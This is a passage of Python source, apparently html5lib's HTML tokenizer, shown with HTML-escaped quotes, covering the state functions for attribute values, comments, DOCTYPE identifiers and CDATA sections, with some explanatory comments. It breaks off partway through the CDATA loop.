            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;][-1][1] += &quot;\uFFFD&quot;
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-attribute-value-no-quotes&quot;})
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;][-1][1] += data + self.stream.charsUntil(
                frozenset((&quot;&amp;&quot;, &quot;&gt;&quot;, &#039;&quot;&#039;, &quot;&#039;&quot;, &quot;=&quot;, &quot;&lt;&quot;, &quot;`&quot;, &quot;\u0000&quot;)) | spaceCharacters)
        return True

    def afterAttributeValueState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.state = self.beforeAttributeNameState
        elif data == &quot;&gt;&quot;:
            self.emitCurrentToken()
        elif data == &quot;/&quot;:
            self.state = self.selfClosingStartTagState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-EOF-after-attribute-value&quot;})
            self.stream.unget(data)
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-character-after-attribute-value&quot;})
            self.stream.unget(data)
            self.state = self.beforeAttributeNameState
        return True

    def selfClosingStartTagState(self):
        data = self.stream.char()
        if data == &quot;&gt;&quot;:
            self.currentToken[&quot;selfClosing&quot;] = True
            self.emitCurrentToken()
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;:
                                    &quot;unexpected-EOF-after-solidus-in-tag&quot;})
            self.stream.unget(data)
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-character-after-solidus-in-tag&quot;})
            self.stream.unget(data)
            self.state = self.beforeAttributeNameState
        return True

    def bogusCommentState(self):
        # Make a new comment token and give it as value all the characters
        # until the first &gt; or EOF (charsUntil checks for EOF automatically)
        # and emit it.
        data = self.stream.charsUntil(&quot;&gt;&quot;)
        data = data.replace(&quot;\u0000&quot;, &quot;\uFFFD&quot;)
        self.tokenQueue.append(
            {&quot;type&quot;: tokenTypes[&quot;Comment&quot;], &quot;data&quot;: data})

        # Eat the character directly after the bogus comment which is either a
        # &quot;&gt;&quot; or an EOF.
        self.stream.char()
        self.state = self.dataState
        return True

    def markupDeclarationOpenState(self):
        # Decides which kind of markup declaration is being opened:
        #   * two dashes start a comment,
        #   * a case-insensitive match of the letters d-o-c-t-y-p-e starts a
        #     doctype,
        #   * [CDATA[ (exact case) starts a CDATA section, but only when a
        #     parser is attached and its innermost open element is outside the
        #     default namespace of the tree.
        # Anything else is a parse error and is re-read as a bogus comment.
        # Always returns True.
        #
        # charStack records every character consumed here so that all of them
        # can be pushed back onto the stream if no alternative matches.
        charStack = [self.stream.char()]
        if charStack[-1] == &quot;-&quot;:
            charStack.append(self.stream.char())
            if charStack[-1] == &quot;-&quot;:
                self.currentToken = {&quot;type&quot;: tokenTypes[&quot;Comment&quot;], &quot;data&quot;: &quot;&quot;}
                self.state = self.commentStartState
                return True
            # A single dash falls through to the error handling below.
        elif charStack[-1] in (&#039;d&#039;, &#039;D&#039;):
            matched = True
            # Each tuple holds the accepted lower/upper case form of the next
            # expected letter; stop reading at the first mismatch.
            for expected in ((&#039;o&#039;, &#039;O&#039;), (&#039;c&#039;, &#039;C&#039;), (&#039;t&#039;, &#039;T&#039;),
                             (&#039;y&#039;, &#039;Y&#039;), (&#039;p&#039;, &#039;P&#039;), (&#039;e&#039;, &#039;E&#039;)):
                charStack.append(self.stream.char())
                if charStack[-1] not in expected:
                    matched = False
                    break
            if matched:
                # Fresh doctype token; it starts out marked as correct.
                self.currentToken = {&quot;type&quot;: tokenTypes[&quot;Doctype&quot;],
                                     &quot;name&quot;: &quot;&quot;,
                                     &quot;publicId&quot;: None, &quot;systemId&quot;: None,
                                     &quot;correct&quot;: True}
                self.state = self.doctypeState
                return True
        elif (charStack[-1] == &quot;[&quot; and
              self.parser is not None and
              self.parser.tree.openElements and
              self.parser.tree.openElements[-1].namespace != self.parser.tree.defaultNamespace):
            matched = True
            # Unlike the doctype keyword, this comparison is case-sensitive.
            for expected in [&quot;C&quot;, &quot;D&quot;, &quot;A&quot;, &quot;T&quot;, &quot;A&quot;, &quot;[&quot;]:
                charStack.append(self.stream.char())
                if charStack[-1] != expected:
                    matched = False
                    break
            if matched:
                self.state = self.cdataSectionState
                return True

        # No alternative matched: report it, then hand the input back.
        self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                &quot;expected-dashes-or-doctype&quot;})

        # Unget in reverse order of reading so the stream is restored to the
        # position it had on entry.
        while charStack:
            self.stream.unget(charStack.pop())
        self.state = self.bogusCommentState
        return True

    def commentStartState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.state = self.commentStartDashState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;] += &quot;\uFFFD&quot;
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;incorrect-comment&quot;})
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-comment&quot;})
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;] += data
            self.state = self.commentState
        return True

    def commentStartDashState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.state = self.commentEndState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;] += &quot;-\uFFFD&quot;
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;incorrect-comment&quot;})
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-comment&quot;})
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;] += &quot;-&quot; + data
            self.state = self.commentState
        return True

    def commentState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.state = self.commentEndDashState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;] += &quot;\uFFFD&quot;
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;eof-in-comment&quot;})
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;] += data + \
                self.stream.charsUntil((&quot;-&quot;, &quot;\u0000&quot;))
        return True

    def commentEndDashState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.state = self.commentEndState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;] += &quot;-\uFFFD&quot;
            self.state = self.commentState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-comment-end-dash&quot;})
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;] += &quot;-&quot; + data
            self.state = self.commentState
        return True

    def commentEndState(self):
        data = self.stream.char()
        if data == &quot;&gt;&quot;:
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;] += &quot;--\uFFFD&quot;
            self.state = self.commentState
        elif data == &quot;!&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-bang-after-double-dash-in-comment&quot;})
            self.state = self.commentEndBangState
        elif data == &quot;-&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-dash-after-double-dash-in-comment&quot;})
            self.currentToken[&quot;data&quot;] += data
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-comment-double-dash&quot;})
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            # XXX
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-comment&quot;})
            self.currentToken[&quot;data&quot;] += &quot;--&quot; + data
            self.state = self.commentState
        return True

    def commentEndBangState(self):
        data = self.stream.char()
        if data == &quot;&gt;&quot;:
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data == &quot;-&quot;:
            self.currentToken[&quot;data&quot;] += &quot;--!&quot;
            self.state = self.commentEndDashState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;] += &quot;--!\uFFFD&quot;
            self.state = self.commentState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-comment-end-bang-state&quot;})
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;] += &quot;--!&quot; + data
            self.state = self.commentState
        return True

    def doctypeState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.state = self.beforeDoctypeNameState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-doctype-name-but-got-eof&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;need-space-after-doctype&quot;})
            self.stream.unget(data)
            self.state = self.beforeDoctypeNameState
        return True

    def beforeDoctypeNameState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            pass
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-doctype-name-but-got-right-bracket&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;name&quot;] = &quot;\uFFFD&quot;
            self.state = self.doctypeNameState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-doctype-name-but-got-eof&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;name&quot;] = data
            self.state = self.doctypeNameState
        return True

    def doctypeNameState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.currentToken[&quot;name&quot;] = self.currentToken[&quot;name&quot;].translate(asciiUpper2Lower)
            self.state = self.afterDoctypeNameState
        elif data == &quot;&gt;&quot;:
            self.currentToken[&quot;name&quot;] = self.currentToken[&quot;name&quot;].translate(asciiUpper2Lower)
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;name&quot;] += &quot;\uFFFD&quot;
            self.state = self.doctypeNameState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype-name&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.currentToken[&quot;name&quot;] = self.currentToken[&quot;name&quot;].translate(asciiUpper2Lower)
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;name&quot;] += data
        return True

    def afterDoctypeNameState(self):
        # Runs after the doctype name and its trailing whitespace.  Looks for
        # the end of the doctype or for one of the keywords PUBLIC / SYSTEM
        # (matched case-insensitively, one character at a time); anything else
        # flags the token as incorrect and continues in bogusDoctypeState.
        # Always returns True.
        data = self.stream.char()
        if data in spaceCharacters:
            pass
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            self.currentToken[&quot;correct&quot;] = False
            self.stream.unget(data)
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            if data in (&quot;p&quot;, &quot;P&quot;):
                matched = True
                # Each tuple holds the accepted lower/upper case form of the
                # next keyword letter.  data is overwritten on every read, so
                # after a mismatch it holds the offending character.
                for expected in ((&quot;u&quot;, &quot;U&quot;), (&quot;b&quot;, &quot;B&quot;), (&quot;l&quot;, &quot;L&quot;),
                                 (&quot;i&quot;, &quot;I&quot;), (&quot;c&quot;, &quot;C&quot;)):
                    data = self.stream.char()
                    if data not in expected:
                        matched = False
                        break
                if matched:
                    self.state = self.afterDoctypePublicKeywordState
                    return True
            elif data in (&quot;s&quot;, &quot;S&quot;):
                matched = True
                # Same scheme as above for the remaining letters of SYSTEM.
                for expected in ((&quot;y&quot;, &quot;Y&quot;), (&quot;s&quot;, &quot;S&quot;), (&quot;t&quot;, &quot;T&quot;),
                                 (&quot;e&quot;, &quot;E&quot;), (&quot;m&quot;, &quot;M&quot;)):
                    data = self.stream.char()
                    if data not in expected:
                        matched = False
                        break
                if matched:
                    self.state = self.afterDoctypeSystemKeywordState
                    return True

            # All the characters read before the current &#039;data&#039; will be
            # [a-zA-Z], so they&#039;re garbage in the bogus doctype and can be
            # discarded; only the latest character might be &#039;&gt;&#039; or EOF
            # and needs to be ungetted
            self.stream.unget(data)
            # The offending character is attached to the error as datavars.
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-space-or-right-bracket-in-doctype&quot;, &quot;datavars&quot;:
                                    {&quot;data&quot;: data}})
            self.currentToken[&quot;correct&quot;] = False
            self.state = self.bogusDoctypeState

        return True

    def afterDoctypePublicKeywordState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.state = self.beforeDoctypePublicIdentifierState
        elif data in (&quot;&#039;&quot;, &#039;&quot;&#039;):
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-doctype&quot;})
            self.stream.unget(data)
            self.state = self.beforeDoctypePublicIdentifierState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.stream.unget(data)
            self.state = self.beforeDoctypePublicIdentifierState
        return True

    def beforeDoctypePublicIdentifierState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            pass
        elif data == &quot;\&quot;&quot;:
            self.currentToken[&quot;publicId&quot;] = &quot;&quot;
            self.state = self.doctypePublicIdentifierDoubleQuotedState
        elif data == &quot;&#039;&quot;:
            self.currentToken[&quot;publicId&quot;] = &quot;&quot;
            self.state = self.doctypePublicIdentifierSingleQuotedState
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-end-of-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.state = self.bogusDoctypeState
        return True

    def doctypePublicIdentifierDoubleQuotedState(self):
        data = self.stream.char()
        if data == &quot;\&quot;&quot;:
            self.state = self.afterDoctypePublicIdentifierState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;publicId&quot;] += &quot;\uFFFD&quot;
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-end-of-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;publicId&quot;] += data
        return True

    def doctypePublicIdentifierSingleQuotedState(self):
        data = self.stream.char()
        if data == &quot;&#039;&quot;:
            self.state = self.afterDoctypePublicIdentifierState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;publicId&quot;] += &quot;\uFFFD&quot;
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-end-of-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;publicId&quot;] += data
        return True

    def afterDoctypePublicIdentifierState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.state = self.betweenDoctypePublicAndSystemIdentifiersState
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data == &#039;&quot;&#039;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-doctype&quot;})
            self.currentToken[&quot;systemId&quot;] = &quot;&quot;
            self.state = self.doctypeSystemIdentifierDoubleQuotedState
        elif data == &quot;&#039;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-doctype&quot;})
            self.currentToken[&quot;systemId&quot;] = &quot;&quot;
            self.state = self.doctypeSystemIdentifierSingleQuotedState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.state = self.bogusDoctypeState
        return True

    def betweenDoctypePublicAndSystemIdentifiersState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            pass
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data == &#039;&quot;&#039;:
            self.currentToken[&quot;systemId&quot;] = &quot;&quot;
            self.state = self.doctypeSystemIdentifierDoubleQuotedState
        elif data == &quot;&#039;&quot;:
            self.currentToken[&quot;systemId&quot;] = &quot;&quot;
            self.state = self.doctypeSystemIdentifierSingleQuotedState
        elif data == EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.state = self.bogusDoctypeState
        return True

    def afterDoctypeSystemKeywordState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.state = self.beforeDoctypeSystemIdentifierState
        elif data in (&quot;&#039;&quot;, &#039;&quot;&#039;):
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-doctype&quot;})
            self.stream.unget(data)
            self.state = self.beforeDoctypeSystemIdentifierState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.stream.unget(data)
            self.state = self.beforeDoctypeSystemIdentifierState
        return True

    def beforeDoctypeSystemIdentifierState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            pass
        elif data == &quot;\&quot;&quot;:
            self.currentToken[&quot;systemId&quot;] = &quot;&quot;
            self.state = self.doctypeSystemIdentifierDoubleQuotedState
        elif data == &quot;&#039;&quot;:
            self.currentToken[&quot;systemId&quot;] = &quot;&quot;
            self.state = self.doctypeSystemIdentifierSingleQuotedState
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.state = self.bogusDoctypeState
        return True

    def doctypeSystemIdentifierDoubleQuotedState(self):
        data = self.stream.char()
        if data == &quot;\&quot;&quot;:
            self.state = self.afterDoctypeSystemIdentifierState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;systemId&quot;] += &quot;\uFFFD&quot;
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-end-of-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;systemId&quot;] += data
        return True

    # Tokenizer state: inside a single-quoted DOCTYPE system identifier.
    #
    # Same branch structure as the double-quoted variant; only the
    # terminating quote character differs. Consumes one character from
    # self.stream per call and always returns True.
    def doctypeSystemIdentifierSingleQuotedState(self):
        data = self.stream.char()
        if data == &quot;&#039;&quot;:
            # Closing single quote: the identifier is complete.
            self.state = self.afterDoctypeSystemIdentifierState
        elif data == &quot;\u0000&quot;:
            # U+0000 is reported as an error and stored as U+FFFD
            # (the Unicode replacement character) instead.
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;systemId&quot;] += &quot;\uFFFD&quot;
        elif data == &quot;&gt;&quot;:
            # Greater-than sign before the closing quote: report the error,
            # flag the token as not correct, queue it and go back to the
            # data state.
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-end-of-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            # Input ended inside the identifier: report eof-in-doctype, flag
            # the token as not correct, queue it and go back to the data
            # state.
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            # Any other character is part of the identifier; stay in this
            # state.
            self.currentToken[&quot;systemId&quot;] += data
        return True

    # Tokenizer state: after the closing quote of a DOCTYPE system
    # identifier.
    #
    # Consumes one character from self.stream and decides whether the
    # DOCTYPE token is finished, must be abandoned to the bogus DOCTYPE
    # state, or whether to keep waiting. Always returns True.
    def afterDoctypeSystemIdentifierState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            # Skip characters listed in spaceCharacters; remain in this state.
            pass
        elif data == &quot;&gt;&quot;:
            # Greater-than sign: queue the token unchanged and return to the
            # data state.
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            # Input ended before the closing greater-than sign: report the
            # error, flag the token as not correct and queue it anyway.
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            # Unexpected character: report it and switch to the bogus DOCTYPE
            # state. Unlike the EOF branch, this branch leaves the correct
            # flag of the token untouched.
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-doctype&quot;})
            self.state = self.bogusDoctypeState
        return True

    # Tokenizer state: inside a malformed DOCTYPE.
    #
    # Consumes one character per call and discards it until a greater-than
    # sign or the end of input is seen, at which point the current token is
    # queued and the tokenizer returns to the data state. No ParseError is
    # queued here. Always returns True.
    def bogusDoctypeState(self):
        data = self.stream.char()
        if data == &quot;&gt;&quot;:
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            # XXX EMIT
            # The EOF marker is handed back to the stream before switching
            # state (presumably so the data state can observe the end of
            # input itself - confirm against dataState).
            self.stream.unget(data)
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            # Every other character is ignored.
            pass
        return True

    # Tokenizer state: inside a CDATA section.
    #
    # Reads from self.stream until the terminator (two closing square
    # brackets followed by a greater-than sign) or the end of input, then
    # queues the collected text as one Characters token (if non-empty),
    # switches to the data state and returns True.
    def cdataSectionState(self):
        # Collected pieces of text; joined into one string after the loop.
        data = []
        while True:
            # Read in two steps: first up to a closing square bracket, then up
            # to a greater-than sign. NOTE(review): this relies on charsUntil
            # stopping before the given character without consuming it -
            # the assert below depends on that; confirm against the stream
            # implementation.
            data.append(self.stream.charsUntil(&quot;]&quot;))
            data.append(self.stream.charsUntil(&quot;&gt;&quot;))
            char = self.stream.char()
            if char == EOF:
                # Input ended without a terminator; keep what was collected.
                break
            else:
                assert char == &quot;&gt;&quot;
                if data[-1][-2:] == &quot;]]&quot;:
                    # The last piece ends with two closing brackets, so this
                    # greater-than sign completes the terminator. Drop the
                    # brackets from the collected text and stop.
                    data[-1] = data[-1][:-2]
                    break
                else:
                    # A greater-than sign that is not part of the terminator
                    # is ordinary text; keep it and continue scanning.
                    data.append(char)

